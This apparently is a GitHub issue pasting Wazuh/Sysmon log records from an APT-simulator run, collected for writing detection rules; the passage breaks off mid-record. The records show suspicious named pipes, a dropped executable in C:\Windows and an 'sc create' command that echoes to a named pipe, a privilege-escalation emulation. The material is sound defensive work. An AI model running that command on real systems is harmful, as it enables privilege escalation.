Open xrisbarney opened 2 years ago
msagent_fedac123
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "dF3TRoABWZBNLY4m4Lx9",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\TMP\\\\CreateNamedPipe.exe",
"processGuid": "{c64152da-f492-625f-9c05-000000000c00}",
"processId": "9092",
"utcTime": "2022-04-20 11:54:58.579",
"eventType": "CreatePipe",
"pipeName": "\\\\msagent_fedac123",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "17",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Pipe Created:\r\nRuleName: -\r\nEventType: CreatePipe\r\nUtcTime: 2022-04-20 11:54:58.579\r\nProcessGuid: {c64152da-f492-625f-9c05-000000000c00}\r\nProcessId: 9092\r\nPipeName: \\msagent_fedac123\r\nImage: C:\\TMP\\CreateNamedPipe.exe\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "1",
"systemTime": "2022-04-20T11:54:58.5799078Z",
"eventRecordID": "5599",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "17",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"17\",\"version\":\"1\",\"level\":\"4\",\"task\":\"17\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:54:58.5799078Z\",\"eventRecordID\":\"5599\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Pipe Created:\\r\\nRuleName: -\\r\\nEventType: CreatePipe\\r\\nUtcTime: 2022-04-20 11:54:58.579\\r\\nProcessGuid: {c64152da-f492-625f-9c05-000000000c00}\\r\\nProcessId: 9092\\r\\nPipeName: \\\\msagent_fedac123\\r\\nImage: C:\\\\TMP\\\\CreateNamedPipe.exe\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"eventType\":\"CreatePipe\",\"utcTime\":\"2022-04-20 11:54:58.579\",\"processGuid\":\"{c64152da-f492-625f-9c05-000000000c00}\",\"processId\":\"9092\",\"pipeName\":\"\\\\\\\\msagent_fedac123\",\"image\":\"C:\\\\\\\\TMP\\\\\\\\CreateNamedPipe.exe\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:28.592Z",
"location": "EventChannel",
"id": "1650455728.942410",
"timestamp": "2022-04-20T11:55:28.592+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:28.592Z"
],
"timestamp": [
"2022-04-20T11:55:28.592Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
],
"data.win.system.eventID": [
"@kibana-highlighted-field@17@/kibana-highlighted-field@"
]
},
"sort": [
1650455728592
]
}
Rules written.
postex_ssh_fedac123
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "hl3TRoABWZBNLY4m7Lxf",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\TMP\\\\CreateNamedPipe.exe",
"processGuid": "{c64152da-f497-625f-a005-000000000c00}",
"processId": "8548",
"utcTime": "2022-04-20 11:55:03.377",
"eventType": "CreatePipe",
"pipeName": "\\\\postex_ssh_fedac123",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "17",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Pipe Created:\r\nRuleName: -\r\nEventType: CreatePipe\r\nUtcTime: 2022-04-20 11:55:03.377\r\nProcessGuid: {c64152da-f497-625f-a005-000000000c00}\r\nProcessId: 8548\r\nPipeName: \\postex_ssh_fedac123\r\nImage: C:\\TMP\\CreateNamedPipe.exe\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "1",
"systemTime": "2022-04-20T11:55:03.3780002Z",
"eventRecordID": "5609",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "17",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"17\",\"version\":\"1\",\"level\":\"4\",\"task\":\"17\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:03.3780002Z\",\"eventRecordID\":\"5609\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Pipe Created:\\r\\nRuleName: -\\r\\nEventType: CreatePipe\\r\\nUtcTime: 2022-04-20 11:55:03.377\\r\\nProcessGuid: {c64152da-f497-625f-a005-000000000c00}\\r\\nProcessId: 8548\\r\\nPipeName: \\\\postex_ssh_fedac123\\r\\nImage: C:\\\\TMP\\\\CreateNamedPipe.exe\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"eventType\":\"CreatePipe\",\"utcTime\":\"2022-04-20 11:55:03.377\",\"processGuid\":\"{c64152da-f497-625f-a005-000000000c00}\",\"processId\":\"8548\",\"pipeName\":\"\\\\\\\\postex_ssh_fedac123\",\"image\":\"C:\\\\\\\\TMP\\\\\\\\CreateNamedPipe.exe\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:33.214Z",
"location": "EventChannel",
"id": "1650455733.942410",
"timestamp": "2022-04-20T11:55:33.214+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:33.214Z"
],
"timestamp": [
"2022-04-20T11:55:33.214Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
],
"data.win.system.eventID": [
"@kibana-highlighted-field@17@/kibana-highlighted-field@"
]
},
"sort": [
1650455733214
]
}
Rules written.
suspicious exec created
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "vV3URoABWZBNLY4mF7zD",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "System",
"processGuid": "{c64152da-7f8d-625e-eb03-000000000000}",
"processId": "4",
"utcTime": "2022-04-20 11:55:16.307",
"targetFilename": "C:\\\\Windows\\\\b6a1458f396.exe",
"creationUtcTime": "2022-04-19 10:30:46.233",
"user": "NT AUTHORITY\\\\SYSTEM"
},
"system": {
"eventID": "11",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"File created:\r\nRuleName: -\r\nUtcTime: 2022-04-20 11:55:16.307\r\nProcessGuid: {c64152da-7f8d-625e-eb03-000000000000}\r\nProcessId: 4\r\nImage: System\r\nTargetFilename: C:\\Windows\\b6a1458f396.exe\r\nCreationUtcTime: 2022-04-19 10:30:46.233\r\nUser: NT AUTHORITY\\SYSTEM\"",
"version": "2",
"systemTime": "2022-04-20T11:55:16.3224043Z",
"eventRecordID": "5648",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "11",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"11\",\"version\":\"2\",\"level\":\"4\",\"task\":\"11\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3224043Z\",\"eventRecordID\":\"5648\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"File created:\\r\\nRuleName: -\\r\\nUtcTime: 2022-04-20 11:55:16.307\\r\\nProcessGuid: {c64152da-7f8d-625e-eb03-000000000000}\\r\\nProcessId: 4\\r\\nImage: System\\r\\nTargetFilename: C:\\\\Windows\\\\b6a1458f396.exe\\r\\nCreationUtcTime: 2022-04-19 10:30:46.233\\r\\nUser: NT AUTHORITY\\\\SYSTEM\\\"\"},\"eventdata\":{\"utcTime\":\"2022-04-20 11:55:16.307\",\"processGuid\":\"{c64152da-7f8d-625e-eb03-000000000000}\",\"processId\":\"4\",\"image\":\"System\",\"targetFilename\":\"C:\\\\\\\\Windows\\\\\\\\b6a1458f396.exe\",\"creationUtcTime\":\"2022-04-19 10:30:46.233\",\"user\":\"NT AUTHORITY\\\\\\\\SYSTEM\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.307Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.307+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.307Z"
],
"timestamp": [
"2022-04-20T11:55:45.307Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745307
]
}
pipe 334455
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "rF3URoABWZBNLY4mE7y7",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\TMP\\\\CreateNamedPipe.exe",
"processGuid": "{c64152da-f4a2-625f-a905-000000000c00}",
"processId": "8852",
"utcTime": "2022-04-20 11:55:14.666",
"eventType": "CreatePipe",
"pipeName": "\\\\334485",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "17",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Pipe Created:\r\nRuleName: -\r\nEventType: CreatePipe\r\nUtcTime: 2022-04-20 11:55:14.666\r\nProcessGuid: {c64152da-f4a2-625f-a905-000000000c00}\r\nProcessId: 8852\r\nPipeName: \\334485\r\nImage: C:\\TMP\\CreateNamedPipe.exe\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "1",
"systemTime": "2022-04-20T11:55:14.6665619Z",
"eventRecordID": "5631",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "17",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"17\",\"version\":\"1\",\"level\":\"4\",\"task\":\"17\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:14.6665619Z\",\"eventRecordID\":\"5631\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Pipe Created:\\r\\nRuleName: -\\r\\nEventType: CreatePipe\\r\\nUtcTime: 2022-04-20 11:55:14.666\\r\\nProcessGuid: {c64152da-f4a2-625f-a905-000000000c00}\\r\\nProcessId: 8852\\r\\nPipeName: \\\\334485\\r\\nImage: C:\\\\TMP\\\\CreateNamedPipe.exe\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"eventType\":\"CreatePipe\",\"utcTime\":\"2022-04-20 11:55:14.666\",\"processGuid\":\"{c64152da-f4a2-625f-a905-000000000c00}\",\"processId\":\"8852\",\"pipeName\":\"\\\\\\\\334485\",\"image\":\"C:\\\\\\\\TMP\\\\\\\\CreateNamedPipe.exe\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:43.440Z",
"location": "EventChannel",
"id": "1650455743.942410",
"timestamp": "2022-04-20T11:55:43.440+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:43.440Z"
],
"timestamp": [
"2022-04-20T11:55:43.440Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455743440
]
}
Service creation
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "vl3URoABWZBNLY4mF7zD",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-ac05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "3204",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.338",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc create tbbd05 binpath= \\\"%%COMSPEC%% /c echo b6a1458f396 > \\\\\\\\.\\\\pipe\\\\334485\\\" DisplayName= \\\"tbbd05\\\" start= demand",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.338\r\nProcessGuid: {c64152da-f4a4-625f-ac05-000000000c00}\r\nProcessId: 3204\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc create tbbd05 binpath= \"%%COMSPEC%% /c echo b6a1458f396 > \\\\.\\pipe\\334485\" DisplayName= \"tbbd05\" start= demand\r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.3433080Z",
"eventRecordID": "5649",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3433080Z\",\"eventRecordID\":\"5649\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.338\\r\\nProcessGuid: {c64152da-f4a4-625f-ac05-000000000c00}\\r\\nProcessId: 3204\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc create tbbd05 binpath= \\\"%%COMSPEC%% /c echo b6a1458f396 > \\\\\\\\.\\\\pipe\\\\334485\\\" DisplayName= \\\"tbbd05\\\" start= demand\\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 11:55:16.338\",\"processGuid\":\"{c64152da-f4a4-625f-ac05-000000000c00}\",\"processId\":\"3204\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc create tbbd05 binpath= \\\\\\\"%%COMSPEC%% /c echo b6a1458f396 > \\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\334485\\\\\\\" DisplayName= \\\\\\\"tbbd05\\\\\\\" start= demand\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.332Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.332+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.332Z"
],
"timestamp": [
"2022-04-20T11:55:45.332Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745332
]
}
Service started
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "x13URoABWZBNLY4mG7yu",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-ad05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "5760",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.359",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc start tbbd05",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.359\r\nProcessGuid: {c64152da-f4a4-625f-ad05-000000000c00}\r\nProcessId: 5760\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc start tbbd05 \r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.3609813Z",
"eventRecordID": "5658",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3609813Z\",\"eventRecordID\":\"5658\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.359\\r\\nProcessGuid: {c64152da-f4a4-625f-ad05-000000000c00}\\r\\nProcessId: 5760\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc start tbbd05 \\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 11:55:16.359\",\"processGuid\":\"{c64152da-f4a4-625f-ad05-000000000c00}\",\"processId\":\"5760\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc start 